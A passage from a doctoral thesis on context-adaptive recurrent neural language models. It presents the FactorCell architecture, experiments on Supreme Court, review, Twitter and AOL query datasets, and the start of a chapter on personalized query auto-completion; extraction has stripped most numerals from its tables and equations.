of adaptation. results are listed in table . . the most useful variable is the indicator for the case. the role variable is highly redundant—almost every speaker only appears in a single role. therefore, it is not surprising that the speaker variable is more useful to the model than the role. in table . we list sentences generated from the fully adapted model (same one as the last line in table . ) using beam search. the value of the context variable for the case is held fixed while we explore different values for the speaker and role variables. anecdotally, we see that the model captures some information about john roberts role as chief justice. the model learns that justice breyer tends to start his questions with the phrase “i mean” while justice kagan tends to start with “well”. roberts and kagan appear in our data both as justices and earlier as advocates. hidden output × + lr hash ppl ∆ppl acc n n n n . – – n n n y . . % . n n y n . . % . n n y y . . % . n y n n . . % . n y n y . . % . n y y n . . % . n y y y . . % . y n n n . . % . y n n y . . % . y n y n . . % . y n y y . . % . y y n n . . % . y y n y . . % . y y y n . . % . y y y y . . % . table . : results on the scotus data in terms of perplexity and classification accuracy (acc) for the justice identification task. case spkr. role ppl n n n . n n y . n y n . n y y . y n n . y n y . y y n . y y y . table . : perplexities for different combinations of context variables on the scotus corpus. spkr. role sentence roberts j. we’ll hear argument first this morning in ayers. breyer j. i mean, i don’t think that’s right. kagan j. well, i don’t think that’s right. kagan a. mr. chief justice, and may it please the court: bork a. --no, i don’t think so, your honor. table . : sentences generated from the adapted model using beam search under different assumptions for speaker and role contexts. . comparison to related work the multiplicative rescaling of the recurrent layer weights is used in the hypernetwork model (ha et al., ). the focus of this model is to allow the lstm to adjust automatically depending on the context of the previous words. this is different from our work in that we are adapting based on contextual information external to the word sequence. gangireddy et al. ( ) also use a rescaling of the hidden layer for adaptation but it is done as a fine-tuning step and not during training like our model. the rnnme model from mikolov et al. ( ) uses feature hashing to train a maximum entropy model alongside an rnn language model. the setup is similar to our method of using hashing to learn context-dependent biases. however, there are a number of differences. the motivation for the rnnme model was to speedup training of the rnn, not to compen- sate for the inadequacy of low-rank output layer adaptation, which had yet to be invented. furthermore, mikolov et al. ( ) do not use context dependent features in the max-ent component of the rnnme model, nor do they have a method for dealing with hash collisions such as our use of bloom filters. the idea of having one part of a language model be low-rank and another part to be an additive correction to the low-rank model has been investigated in other work (eisenstein et al., b; hutchinson et al., ; parikh et al., ). in both of these cases, the correction term is encouraged to be sparse by including an l penalty. our implementation did not promote sparsity in the hash adaptation features but this idea is worth further consideration. the hybrid lstm and count based language model is an alternative way of correcting for a low-rank approximation (neubig and dyer, ). . summary while our results suggest that there is not a one-size-fits-all approach to language model adaptation, it is clear that we improve over the standard adaptation approach. the model see appendix a for a deeper look at this idea. from mikolov and zweig ( ), equivalent to using just additive adaptation on the hidden layer and low-rank adaptation of the output layer, is outperformed for all three datasets at both the language modeling and classification tasks. the combined low-rank and hash adaptation of the output layer were consistently required to get the best perplexity. for the classification tasks, the multiplicative hidden layer adaptation is clearly useful, as is the combined low-rank and hash adaptation of the output layer. importantly, there is not always a strong relationship between perplexity and classification scores. our results may have implications for work on text generation where it can be more desirable to have more control over the generation rather than the lowest perplexity model. this issue is explored further in chapter . our investigation of the language context in the twitter experiments gives a useful take- away: context variables that are easily predictable from the text alone are unlikely to be helpful. more studies are needed to get a more complete understanding about what types of context variables will provide the most benefit. to that end, additional contexts are explored in subsequent chapters. based on the results from the scotus experiments, we know that an additive transfor- mation of the bias by itself is not always the best way to adapt the recurrent layer. this motivated us to look for a new approach that would give more consistent perplexity gains so that we could be confident recommending its use in most situations. further investigation led us to develop the factorcell model, which is the subject of the next chapter. chapter factor cell model in this chapter we introduce the factorcell model for adapting the recurrent layer of an rnn language model. this is a major contribution of the thesis. instead of taking context as an additional input to the model, we conceive of adaptation in a totally new way where the model generates a custom recurrent layer for any context. this is accomplished using a low-rank decomposition in order to control the extent of parameter sharing between contexts, which is important for handling high-dimensional, sparse contexts. the experiments in this chapter will show that the factorcell improves perplexity and that it also has qualitative differences that set it apart from other models. the factorcell model generalizes the concatcell and remedies one of its major weak- nesses. when there is a large amount of data available per context then there is less need to share information between contexts. likewise, where there are many contexts and less training data per context it is better to do more parameter sharing. the concatcell is not able to trade-off between these scenarios. it always shares almost all of its parameters across contexts. in contrast, the factorcell rank hyperparameter allows complete control over how much sharing there is between contexts. aside from perplexity, computation cost is always a consideration. a reliable and easy way to reduce perplexity is to increase the recurrent layer dimension. in latency-constrained applications (most industry speech recognition systems have strict latency constraints), the recurrent state dimension is limited. by design, the factorcell permits pre-computation and caching so that its overall computational cost is negligibly more than the much simpler concatcell. all of the benefits of more adaptation are delivered with no extra latency. this chapter draws on content from some of our previously published work (jaech and ostendorf, a). the factorcell is an alternative to the multiplicative transform explored in chapter , which has the advantage of dedicating more parameters to the adaptation and affecting a bigger change on the recurrent layer weights. unlike the multiplicative transform, we find that the factorcell model consistently improves perplexity. . factorcell model our model uses adaptation in both the recurrent layer and in the bias vector of the output layer. in this section we describe methods for adapting the recurrent layer and the softmax layer, showing that our proposed model is a generalization of most prior methods. . . adapting the recurrent layer our proposed model extends the concatcell by using a context-dependent weight matrix w′ = w + a, in place of the generic weight matrix w. (we refer to w as generic because it is shared across all context settings.) the adaptation matrix, a, is generated by taking the product of the context embedding vector against a set of left and right basis tensors to produce a rank r matrix. the left and right adaptation basis tensors are given as zl ∈ rk×(p+q)×r and zr ∈ rr×q×k. the two basis tensors together can be thought of as holding k different rank r matrices, aj = zl,jzr,j, each the size of w. by taking the product between c and the corresponding tensor modes of zl and zr (using ×i to denote the mode-i tensor product, i.e., the product with the i-th dimension of the tensor), the context determines the weighted combination of the k matrices: a = (c× zl)(zr × cᵀ). ( . ) (figure . is a visualization of the factorcell architecture.) the number of degrees of freedom of a is controlled by the dimension k of the context vector and the rank r of the k weight matrices. the rank is treated as a hyperparameter and controls the extent to which the model relies on the generic weight matrix w versus behaves in a more context-specific manner. figure . : illustration of the factorcell architecture. we call this model the factorcell because the weight matrix has been adapted by adding a factored component. the concatcell model is a special case of the factorcell where zl and zr are set to zero. in summary, the proposed model is given by: ht = σ(w ′[ewt,ht− ] + b ′ ) w′ = w + (c× zl)(zr × c) b′ = qc + b . ( . ) if the context is known in advance, w′ can be precomputed, in which case applying the rnn at test time requires no more computation than using an unadapted rnn of the same size. this means that for a fixed sized recurrent layer, the factorcell model can have many more parameters than the concatcell model but hardly any increase in computational cost. when adapting with the factorcell method, we find it necessary to also include the shift of the bias in the softmax output as described in equation . . . . lstm factorcell equations only trivial changes are needed to use the factorcell method on an lstm instead of a vanilla rnn. here, we list the equations for an lstm with coupled input and forget gates, which is what was used in our experiments. the weight matrix w from equation . is now size q × (p + q) and b is dimension q, where is the number of gates. likewise, zr from equation . is made to be of size r × q × k. the weight matrix w′ is as defined in equation . and after computing its product with the input [wt,ht− ], the result is split into three vectors of equal size: it, ft, and ot [it,ft,ot] = w ′[ewt,ht− ] + b , ( . ) which are used in the input gate, the forget gate, and the output gate, respectively. using these three vectors we perform the gating operations to compute ht using the memory cell mt as follows: ft ← sigmoid(ft + . ) mt = mt− �ft + ( . −ft) � tanh(it) ht = tanh(mt) � sigmoid(ot) ( . ) note that equation . , which shows that a context vector concatenated with input is equivalent to an additive bias term, extends to equation . . in other words, in the lstm version of the concatcell model, the context vector effectively introduces an extra bias term for each of the three gates. . data name train dev test vocab docs. context agnews . m . m . m , k newspaper sections dbpedia . m . m . m , k entity categories tripadvisor . m . m . m , k . k hotels/ sentiment yelp . m . m . m , k sentiment eurotwitter∗ . m . m . m k languages geotwitter∗ . m . m . m k latitude & longitude table . : dataset statistics: dataset size in words (* or characters) of train, dev and test sets, vocabulary size, number of training documents, and context variables. the experiments make use of six datasets: four targeting word-level sequences, and two targeting character sequences. the character studies are motivated by the growing interest in character-level models in both speech recognition and machine translation (hannun et al., ; chung et al., ). by using multiple datasets with different types of context, we hope to learn more about what makes a dataset amenable to adaptation. the datasets range in size from over million words of training data to million characters of training data for the smallest one. when using a word-based vocabulary, we preprocess the data by lowercasing, tokenizing and removing most punctuation. we also truncate sentences to be shorter than a maximum length of words for agnews and dbpedia and to tokens for the remaining datasets. summary information is provided in table . , including the training, development, and test data sizes in terms of number of tokens, vocabulary size, number of training documents (i.e. context samples), and the context variables (f :n). the largest dataset, tripadvisor, has over thousand hotel review documents, which adds up to over million words of training data. the first three datasets (agnews, dbpedia, and yelp) have previously been used for text classification (zhang et al., ). these consist of newspaper headlines, encyclopedia entries, and restaurant and business reviews, respectively. the context variables associated with these correspond to the newspaper section (world, sports, business, sci & tech) for each headline, the page category on dbpedia (out of options such as actor, athlete, building, etc.), and the star rating on yelp (from one to five). for agnews, dbpedia, and yelp we use the same test data as in previous work. our fourth dataset, from tripadvisor, was previously used for language modeling and consists of two relevant context variables: an identifier for the hotel and a sentiment score from one to five stars (tang et al., ). some of the reviews are written in french or german but most are in english. there are , different hotels but we group all the ones that do not occur at least times in the training data into a single entity, leaving us with around , . these four datasets use word-based vocabularies. we also experiment on two twitter datasets: eurotwitter and geotwitter. eurotwitter is the same as the twitter data used in the previous chapter and consists of thousand tweets labeled with one of nine languages: (english, spanish, galician, catalan, basque, portuguese, french, german, and italian). the corpus was created by combining portions of multiple published datasets for language identification including twitter (jaech et al., ), tweetlid (zubiaga et al., ), and the monolingual portion of tweets from a code- switching detection workshop (molina et al., ). the geotwitter data contains tweets with latitude and longitude information from england, spain, and the united states. the latitude and longitude coordinates are given as numerical inputs. this is different from the other five datasets that all use categorical context variables. . experiments with different contexts the goal of the experiments is to show that the factorcell model can deliver improved performance over current approaches for multiple language model applications and a variety of types of contexts. specifically, results are reported for context-conditioned perplexity and generative model text classification accuracy, using contexts that capture a range of phenomena and dimensionalities. test set perplexity is the most widely accepted method for evaluating language models, both for use in recognition/translation applications and generation. it has the advantage that it is easy to measure and is widely used as a criterion for model fit, but the limitation that it is not directly matched to most tasks that language models are directly used for. text classification using the model in a generative classifier is a simple application of bayes rule: ω̂ = arg max ω p(w :t |ω)p(ω) ( . ) where w :t is the text sequence, p(ω) is the class prior, which we assume to be uniform. classification accuracy provides additional information about the power of a model, even if it is not being designed explicitly for text classification. further, it allows us to be able to directly compare our model performance against previously published text classification data was accessed from http://followthehashtag.com. benchmarks. although the most effective models for text classification have generally been discriminative, generative models can be competitive when the available training data is small or text samples are short (yogatama et al., ), and we find that the factorcell makes the generative model more competitive. note that the use of classification accuracy for evaluation here involves counting errors associated with applying the generative model to independent test samples. this differs from the accuracy criterion used for evaluating context-sensitive language models for text generation based on a separate discriminative classifier trained on generated text (ficler and goldberg, ; hu et al., ). we discuss this further in section . and chapter . the experiments compare the factorcell model (equations . and . ) to two popular alternatives, which we refer to as concatcell (equations . and . ) and softmaxbias (equa- tion . ). as noted earlier, the softmaxbias method is a simplification of the concatcell model, which is in turn a simplification of the factorcell model. the softmaxbias method impacts only the output layer and thus only unigram statistics. since bag-of-word models provide strong baselines in many text classification tasks, we hypothesize that the soft- maxbias model will capture much of the relative improvement over the unadapted model for word-based tasks. however, in small vocabulary character-based models, the unigram dis- tribution is unlikely to carry much information about the context, so adapting the recurrent layer should become more important in character-level models. we expect that performance gains will be greatest for the factorcell model for sources that have sufficient structure and data to support learning the extra degrees of freedom. another possible baseline would use models independently trained on the subset of data for each context. this is the “independent component” case in (yogatama et al., ). this will fail when a context variable takes on many values (or continuous values) or when training data is limited, because it makes poor use of the training data, as shown in that study. while we do have some datasets where this approach is plausible, we feel that its limitations have been clearly established. . . implementation details the rnn variant that we use is an lstm with coupled input and forget gates (melis et al., ). the different model variants are implemented using the tensorflow library. the model is trained with the standard negative log likelihood loss function, i.e. minimizing cross entropy. dropout was used as a regularizer in the recurrent connections (semeniuta et al., ). training is done using the adam optimizer with a learning rate of . . for the models with word-based vocabularies, a sampled softmax loss is used with a unigram proposal distribution and sampling words at each time-step (jean et al., ). the classification experiments use a sampled softmax loss with a sample size of , words. this is an order of magnitude faster to compute with a minimal effect on accuracy. agnews dbpedia eurotwtr geotwtr trip yelp word embed - - - lstm dim - steps . - . k . - . k . - . k . - . k . - . k . - . k dropout . . . - . . - . . - . . ctx. embed - - - - rank table . : selected hyperparameters for each dataset. when a range is listed it means that a different values were selected for the factorcell, concatcell, softmaxbias or unadapted models. hyperparameter tuning was done based on minimizing perplexity on the development set and using a random search. hyperparameters included word embedding size e, recurrent state size d, context embedding size k, and weight adaptation matrix rank r, the number of training steps, recurrent dropout probability, and random initialization seed. we conducted more than tuning experiments with iterative refinements. the number of experiments code available at http://github.com/ajaech/calm. per dataset vaires between and . the selected hyperparameter values are listed in table . . for any fixed lstm size, the factorcell has a higher count of learned parameters compared to the concatcell. however, during evaluation both models use approximately the same number of floating-point operations because w′ only needs to be computed once per sentence. because of this, we believe limiting the recurrent layer cell size is a fair way to compare between the factorcell and the concatcell. . . word-based models agnews dbpedia tripadvisor yelp model ppl acc ppl acc ppl acc ppl acc unadapted . – . – . – . – softmaxbias . . . . . . . . concatcell . . . . . . . . factorcell . . . . . . . . table . : perplexity and classification accuracy on the test set for the four word-based datasets. perplexities and classification accuracies for the four word-based datasets are presented in table . . in each of the four datasets, the factorcell model gives the best perplexity. for classification accuracy, there is a bigger difference between the models, and the factorcell model is the most accurate on three out of four datasets and tied with the softmaxbias model on agnews. for dbpedia and tripadvisor, most of the improvement in perplexity relative to the unadapted case is achieved by the softmaxbias model with smaller relative improvements coming from the increased power of the concatcell and factorcell models. for yelp, the perplexity improvements are small; the factorcell model is just . % better than the unadapted model. from (yogatama et al., ), we see that for agnews, much more so than for other datasets, the unigram statistics capture the discriminating information, and it is the only dataset in that work where a naive bayes classifier is competitive with the generative lstm for the full range of training data. the fact that the softmaxbias model gets the same accuracy as the factorcell model on this task suggests that topic context may benefit less from adapting the recurrent layer. for the dbpedia and yelp datasets, the factorcell model beats previously reported classification accuracies for generative models (yogatama et al., ). however, it is not competitive with state-of-the-art discriminative models on these tasks with the full training set. with less training data, it probably would be, based on the results in (yogatama et al., ). the numbers in table . do not adequately convey the fact that there are hyperparame- ters with an effect on perplexity that is greater than the sometimes small relative differences between models. even the seed for the random weight initialization can have a “major im- pact” on the final performance of an lstm (reimers and gurevych, ). we use figure . to show how the three classes of models perform across a range of hyperparameters. the figure compares perplexity on the x-axis with accuracy on the y-axis with both metrics computed on the development set. each point in this figure represents a different instance of the model trained with random hyperparameter settings and the best results are in the upper right corner of each plot. the color/shape differences of the points correspond to the three classes of models: factorcell, concatcell, and softmaxbias. within the same model class but across different hyperparameter settings, there is much more variation in perplexity than in accuracy. the lstm cell size is mainly responsible for this; it has a much bigger impact on perplexity than on accuracy. it is also apparent that the models with the lowest perplexity are not always the ones with the highest accuracy. notably, improvements in perplexity are associated with a decrease in accuracy for the softmaxbias models on the dbpedia, tripadvisor, and yelp datasets. in bowman et al. ( ), it was observed that the more powerful the decoder of a variational auto-encoder was the more likely it was to ignore the prior information given by the encoder. a similar effect figure . : accuracy vs. perplexity for different classes of models on the four word-based datasets. is happening here where when the recurrent layer size is increased then the model relies less on the unigram prior provided by the adapted softmax bias vector. see section . . for further hyperparameter analysis. figure . is a visualization of the per-word log likelihood ratios between a model as- suming a star review and the same model assuming a star review. likelihoods were computed using an ensemble of three models to reduce variance. the analysis is repeated for each class of model. words highlighted in blue are given a higher likelihood under the star assumption. unigrams with strong sentiment such as “lovely” and “friendly” are well-represented by all three models. the reader may not consider the tokens “craziness” or “ - pm” to be strong indicators of a positive review but the way they are used in this review is representative of how they are typically used across the corpus. as expected, the concatcell and factorcell model capture the sentiment of multi-token phrases. as an example, the unigram “enough” is % more likely to occur in a star review than in a star review. however, “do enough” is times more likely to appear in a star review than in a star review. in this example, the factorcell model does a better job of handling the word “enough.” . . character-based models next, we evaluate the eurotwitter and geotwitter models using both perplexity and a classification task. for eurotwitter, the classification task is to identify the language. with geotwitter, it is less obvious what the classification task should be because the context values are continuous and not categorical. we selected six cities and then assigned each sentence the label of the closest city in that list while still retaining the exact coordinates of the tweet. there are two cities from each country: manchester, london, madrid, barcelona, new york city, and los angeles. tweets from locations further than km from the nearest city in the list were discarded when evaluating the classification accuracy. the classification task is sufficient to investigate the properties of the language model but, unlike some prior work, it is not designed to capture geographic lexical variations in an easily interpretable manner (eisenstein et al., ) nor is it designed to be efficient at geolocation (han et al., ). perplexities and classification accuracies are presented in table . . the factorcell model has the lowest perplexity and the highest accuracy for both datasets. again, the factorcell model clearly improves on the concatcell as measured by classification accuracy. consistent with our hypothesis, adapting the softmax bias is not effective for these small vocabulary character-based tasks. the softmaxbias model has small perplexity improvements (< %) and low classification accuracies. figure . compares perplexity and classification accuracy for different hyperparameter settings of the character-based models. again, we see that it is possible to trade-off some softmaxbias concatcell factorcell figure . : log likelihood ratio between a model that assumes a star review and the same model that assumes a star review. blue indicates a higher star likelihood and red is a higher likelihood for the star condition. eurotwitter geotwitter model ppl acc ppl acc unadapted . – . – softmaxbias . . . . concatcell . . . . factorcell . . . . table . : perplexity and classification accuracies for the eurotwitter and geotwitter datasets. perplexity for gains in classification accuracy. for eurotwitter, if tuning is done on accuracy rather than perplexity then the accuracy of the best model is as high as %. . . hyperparameter analysis the hyperparameter with the strongest effect on perplexity is the size of the lstm. this was consistent across all six datasets. the effect on classification accuracy of increasing the lstm size was mixed. increasing the context embedding size generally helped with accuracy on all datasets, but it had a more neutral effect on tripadvisor and yelp and increased perplexity on the two character-based datasets. for the factorcell model, increasing the rank of the adaptation matrix tended to lead to increased classification accuracy on all datasets and seemed to help with perplexity on agnews, dbpedia, and tripadvisor. figure . compares the effect on perplexity of the lstm parameter count and the fac- torcell rank hyperparameters. each point in those plots represents a separate instance of the model with varied hyperparameters. in the right subplot of figure . , we see that increasing the rank hyperparameter improves perplexity. this is consistent with our hypothesis that increasing the rank can let the model adapt more. the variance is large because differences in other hyperparameters (such as hidden state size) also have an impact. in the left subplot we compare the performance of the factorcell with the concatcell as figure . : accuracy vs. perplexity for different classes of models on the two character-based datasets. the size of the word embeddings and recurrent state change. the x-axis is the size of the w recurrent weight matrix, specifically (e + d)d for an lstm with gates. since the adapted weights can be precomputed, the computational cost is roughly the same for points with the same x-value. for a fixed-size hidden state, the factorcell model has a better perplexity than the concatcell. since performance can be improved both by increasing the recurrent state dimension and/or by increasing rank, we examined the relative benefits of each. the perplexity of a factorcell model with an lstm size of k will improve by % when the rank is increased from to . to get the same decrease in perplexity by changing the size of the hidden state would require k parameters, resulting in a significant computational advantage for the factorcell model. using a one-hot vector for adapting the softmax bias layer in place of the context em- bedding when adapting the softmax bias vector tended to have a large positive effect on accuracy leaving perplexity mostly unchanged. recall from section . that if the number of values that a context variable can take on is small then we can allow the model to choose between using the low-dimensional context embedding or a one-hot vector. this option is figure . : comparison of the effect of lstm parameter count and factorcell rank hyper- parameters on perplexity for dbpedia. not available for the tripadvisor and the geotwitter datasets because the dimensionality of their one-hot vectors would be too large. the method of adapting the softmax bias is the main explanation for why some concatcell models performed significantly above/below the trendline for dbpedia in figure . . we experimented with an additional hyperparameter on the yelp dataset, namely the inclusion of layer normalization (ba et al., ). (we had ruled-out using layer normaliza- tion in preliminary work on the agnews data before we understood that agnews is not representative, so only one task was explored here.) layer normalization significantly helped the perplexity on yelp (≈ % relative improvement) and all of the top-performing models on the held-out development data had it enabled. . analysis for sparse contexts the tripadvisor data is an interesting case because the original context space is high di- mensional ( hotels × user ratings) and sparse. since the model applies end-to-end learning, we can investigate what the context embeddings learn. in particular, we looked at location (hotels are from cities in the united states) and class of hotel, neither of which another option for the tripadvisor data is to use the hashing method from section . . . are input to the model. all of what it learns about these concepts come from extracting information from the text of the reviews. to visualize the embedding, we used a -dimensional principal component analysis (pca) projection of the embeddings of the hotels. we found that the model learns to group the hotels based on geographic region; the projected embeddings for the largest cities are shown in figure . , plotting the . σ ellipsoid of the gaussian distribution of the points. (actual points are not shown to avoid clutter.) not only are hotels from the same city grouped together, cities that are close geographically appear close to each other in the embedding space. cities in the southwest appear on the left of the figure, the west coast is on top and the east coast and midwest is on the right side. this is likely due in part to the impact of the region on activities that guests may mention, but there also appears to be a geographic sampling bias in the hotel class that may impact language use. figure . shows the projected hotel embeddings in the same space as figure . except that the points are now colored based on the hotel class. class is a rating from an independent agency that indicates the level of service and amenities that customers can expect to receive at a hotel. whereas, the star rating is the average score given to each establishment by the customers who reviewed it. hotel class does not determine star rating although they are correlated (r = . ). the dataset does not contain a uniform sample of hotel classes from each city. the hotels included from boston, chicago, and philly are almost exclusively high class and the ones from l.a. and san diego happen to be low class, so the embedding distributions also reflect hotel class: lower class hotels towards the top left and higher class hotels towards the bottom right. the visualization for the concatcell and softmaxbias models are similar. another way of understanding what the context embeddings represent is to compute the softmax bias projection gc and examine the words that experience the biggest increase in probability. we show three examples in table . . in each case, the top words are strongly related to geography and include names of neighborhoods, local attractions, and other hotels in the same city. the top boosted words are relatively unaffected by changing the rating. figure . : distribution of a pca projection of hotel embeddings from the tripadvisor factorcell model showing the grouping of the hotels by city. figure . : distribution of a pca projection of the hotel embeddings from the tripadvisor factorcell model showing the grouping of hotels by class. (recall that the hotel identifier and the user rating are the only two inputs used to create the context embedding.) this table combined with the other visualizations indicates that location effects tend to dominate in the output layer, which may explain why the two models adapting the recurrent network seem to have a bigger impact on classification performance. hotel city class rating top boosted words amalfi chicago . amalfi, chicago, allegro, burnham, sable, michigan, acme, conrad, tal- bott, wrigley blvd hotel suites los angeles . hollywood, kodak, highland, univer- sal, reseda, griffith, grauman’s, bev- erly, ventura four points sheraton seattle . seattle, pike, watertown, deca, nee- dle, pikes, pike’s monorail, uw, safeco table . : the top boosted words in the softmax bias layer for different context settings in a factorcell model. . comparison to related work the studies that most directly relate to our work are neural models that correspond to special cases of the more general factorcell model, including those that leverage what we call the softmaxbias model (dieng et al., ; tang et al., ; yogatama et al., ; ficler and goldberg, ) and others that use the concatcell approach (mikolov and zweig, ; wen et al., ; chen et al., ; ghosh et al., ). the factorcell model is distinguished by having an additive (factored) context-dependent transformation of the recurrent layer weight matrix. a related additive context-dependent transformation has been proposed for log-bilinear sequence models (eisenstein et al., a; hutchinson et al., ), but these are less powerful than the rnn. factored tensors have been successfully used in other nlp applications such as dependency parsing (lei et al., ). a somewhat different use of low-rank factorization has previously been used to reduce the parameter count in an lstm lm (kuchaiev and ginsburg, ), finding that the reduced number of parameters leads to faster training. much of the work on context-adaptive neural language models has focused on incorpo- rating document or topic information (mikolov and zweig, ; ji et al., ; ghosh et al., ; dieng et al., ), where context is defined in terms of word or n-gram statistics. our work differs from these studies in that the context is defined by a variety of sources, including discrete and/or continuous metadata, which is mapped to a context vector in end-to-end training. context-sensitive language models for text generation tend to involve other forms of context similar to the objective of our work, including speaker characteristics (luan et al., ; li et al., ), dialog act (wen et al., ), sentiment and other fac- tors (tang et al., ; hu et al., ), and style (ficler and goldberg, ). our work is distinctive in assessing performance over a broad variety of context variables. . summary in summary, this chapter has introduced a new model for adapting (or controlling) a lan- guage model depending on contextual metadata. the factorcell model extends prior work with context-dependent rnns by using the context vector to generate a low-rank, factored, additive transformation of the recurrent cell weight matrix. experiments with six tasks show that the factorcell model matches or exceeds performance of alternative methods in both perplexity and text classification accuracy. findings hold for a variety of types of context, including high-dimensional contexts, and the adaptation of the recurrent layer is particularly important for character-level models. for many contexts, the benefit of the factorcell model comes with essentially no additional computational cost at test time, since the transforma- tions can be pre-computed. analyses of a dataset with a high-dimensional sparse context vector show that the model learns context similarities to facilitate parameter sharing. an adapted language model needs to memorize information about the unique language patterns of each context. one way of thinking about the difference between the concatcell and the factorcell models is to ask where in the model is that information encoded. the context embedding c has too few bits to hold much information by itself. the same is true for the concatcell’s q matrix from equation . . the information must be held inside the shared weight matrix w. this exposes a weakness of the concatcell model. if only one context is being used at a time why should the weights for all the contexts be active all the time? the factorcell model has many extra parameters stored in the zl and zr tensors. it is able to offload context specific information to these locations and only use it when it is needed. the models evaluated here were tuned to minimize perplexity, as is typical for language modeling. in analyses of performance with different hyperparameter settings, we find that perplexity is not always positively correlated with accuracy, but the criteria are more often correlated for approaches that adapt the recurrent layer. while not surprising, the results raise concerns about using perplexity as the sole evaluation metric for context-aware lan- guage models. more work is needed to understand the relative utility of these objectives for language model design, which we address in chapter . in real applications, it is possible for the meaning of the contexts to shift over time and the adapted model becomes out-of-date. to fix this, the model needs to be replenished by re-training with new data or it can be updated continuously using online learning. we address the latter of these two strategies in the next chapter. chapter personalized query auto-completion . background this chapter demonstrates the benefits of the factorcell model on the real-world task of query auto-completion (qac). qac is a feature used by search engines that provides a list of suggested queries for the user as they are typing. for instance, if the user types the prefix “mete” then the system might suggest “meters” or “meteorite” as completions. this feature can save the user time and reduce cognitive load (cai et al., ). most approaches to qac are extensions of the most popular completion (mpc) algo- rithm (bar-yossef and kraus, ). mpc suggests completions based on the most popular queries in the training data that match the specified prefix. one way to improve mpc is to consider additional signals such as temporal information (shokouhi and radinsky, ; whiting and jose, ) or information gleaned from a users’ past queries (shokouhi, ). this chapter deals with the latter of those two signals, i.e. personalization. personaliza- tion relies on the fact that query likelihoods are drastically different among different people depending on their needs and interests. recently, (park and chiba, ) suggested a significantly different approach to qac. in their work, completions are generated from a character lstm language model instead of by ranking completions retrieved from a database, as in the mpc algorithm. this approach is able to complete queries whose prefixes were not seen during training and has significant memory savings over having to store a large query database. building on this work, we consider the task of personalized qac using an lstm language model, combining the obvious advantages of personalization with the effectiveness of the the content of this chapter draws from our previously published work (jaech and ostendorf, b). language model in handling rare and previously unseen prefixes. the model must learn how to extract information from a user’s past queries and use it to adapt the generative model for that person’s future queries. user information is held in the form of a low- dimensional embedding that represents the person’s interests and latent demographic factors. the experiments demonstrate that by allowing a greater fraction of the parameters to change in response to the user embeddings, the factorcell has an advantage over the traditional approach to rnn language model adaptation that increases as more examples from the user are seen. this task is different from the experiments described in chapter because new contexts (users) can emerge after the model has been trained and deployed. we introduce a mechanism to do online learning of the user embeddings, something that has not been addressed in prior work on language model adaptation. table . provides an anecdotal example from the trained factorcell model to demonstrate the intended behavior. the table shows the top five completions for the prefix “ba” in a cold start scenario and again after the user has completed five sports related queries. in the warm start scenario, the “baby names” and “babiesrus” completions no longer appear in the top five and have been replaced with “basketball” and “baseball”. in the online learning scenario, the factorcell model makes efficient use of the user query history to quickly improve the quality of the auto-completions. while the standard implementation of mpc can not handle unseen prefixes, there are variants which do have that ability. park and chiba ( ) find that the neural lm out- performs mpc even when mpc has been augmented with the approach from mitra and craswell ( ) for handling rare prefixes. there has also been work on personalizing mpc (shokouhi, ; cai et al., ). we did not compare against these specific models because our goal was to show how personalization can improve the already-proven generative neural model approach. rnn’s have also previously been used for the related task of next query suggestion (sordoni et al., ). wang et al. ( ) show how spelling correction can be integrated into an rnn language model query auto-completion system and how the completions can be generated in real cold start warm start bank of america bank of america barnes and noble basketball babiesrus baseball baby names barnes and noble bank one baltimore table . : top five completions for the prefix ba for a cold start model with no previous queries from that user and a warm model that has seen the queries espn, sports news, nascar, yankees, and nba. time using a gpu. our method of updating the model during evaluation resembles work on dynamic evaluation for language modeling (krause et al., ), but differs in that only the user embeddings (latent demographic factors) are updated. if the rest of the model is allowed to update then either some user embedding can become stale or there will be a large memory cost to hold different versions of the model for each person. one possibility would be to allow the full model to update and also implement a policy to invalidate stale user embeddings but that is beyond the scope of this work. . model adaptation depends on learning an embedding for each user, which we discuss in section . . , and then using that embedding to adjust the weights of the recurrent layer, discussed in section . . . . . learning user embeddings during training, we learn an embedding for each of the users. we think of these embeddings as holding latent demographic factors for each user. users who have less than queries in the training data (around half the users but less than % of the queries) are grouped together as a single entity, user , leaving k users. the user embeddings matrix uk×m, where m is the user embedding size, is learned via back-propagation as part of the end-to-end model. the embedding for an individual user is the ith row of u and is denoted by ui. the user embedding plays the same role as the context embedding from section . . that elsewhere is denoted by c. it is important to be able to apply the model to users that are not seen during training. this is done by online updating of the user embeddings during evaluation. when a new person, userk+ is seen, a new row is added to u and initialized to u . each person’s user embedding is updated via back-propagation every time they select a query. when doing online updating of the user embeddings, the rest of the model parameters (everything except u) are frozen. the learning rate for the online updating should be different than the one used for training the rest of the model. when training the full model, the goal is to converge to a global minimum. during online updating the user embeddings do not converge to a fixed point but continue to track the query history. the optimal learning rate must be found using validation data. . . recurrent layer adaptation we consider three model architectures which differ only in the method for adapting the recurrent layer. first is the unadapted lm, analogous to the model from park and chiba ( ), which does no personalization. the second architecture is the concatcell, which concatenates a user embedding to the character embedding at every step of the input to the recurrent layer. for the third model, we test the factorcell’s ability to let the user embedding transform the weights of the recurrent layer. unlike the previous chapter, we do not incorporate the concatcell adaptation of the recurrent layer bias when using the factorcell model. we found that this was unnecessary in preliminary experiments. when operating at the character-level, the unigram distribution is not particularly in- formative of the differences between users. this is unlike the word-level models, where the unigram distribution can carry topic information. for this reason, we do not employ any of the techniques from chapter for adapting the softmax bias vector. . data the experiments make use of the aol query data collected over three months in (pass et al., ). the first six of the ten files were used for training. this contains approximately million queries from , users for an average of queries per user (median ). a set of , queries from those same users ( % of the data) was reserved for tuning and validation. from the remaining files, one million queries from , users are used to test the models on a disjoint set of users. the chronological ordering of the queries is ignored during training but respected during testing. our results are not directly comparable to park and chiba ( ) or mitra and craswell ( ) due to differences in the partitioning of the data and the method for selecting random prefixes. prior work partitions the data by time instead of by user. splitting by users is necessary in order to properly test personalization over longer time ranges. . experiments . . experiment details the vocabulary consists of characters including special start and stop tokens. models were trained for six epochs. the adam optimizer is used during training with a learning rate of − (kingma and ba, ). the language model is a single-layer character-level lstm with coupled input and forget gates and layer normalization (melis et al., ; ba et al., ). we do experiments on two model configurations: small and large. the small models use an lstm hidden state size of and dimensional user embeddings. the large models use a hidden state size of and dimensional user embeddings. both sizes use dimensional character embeddings. for the small sized models, we experimented with different values of the factorcell rank hyperparameter between and dimensions finding that bigger rank is better. the large sized models used a fixed value of for the rank hyperparemeter. during training only and due to limited computational resources, queries are truncated to a length of characters. the model is implemented using tensorflow. when updating the user embeddings during evaluation, we found that it is easier to use an optimizer without momentum. we use adadelta (zeiler, ) and 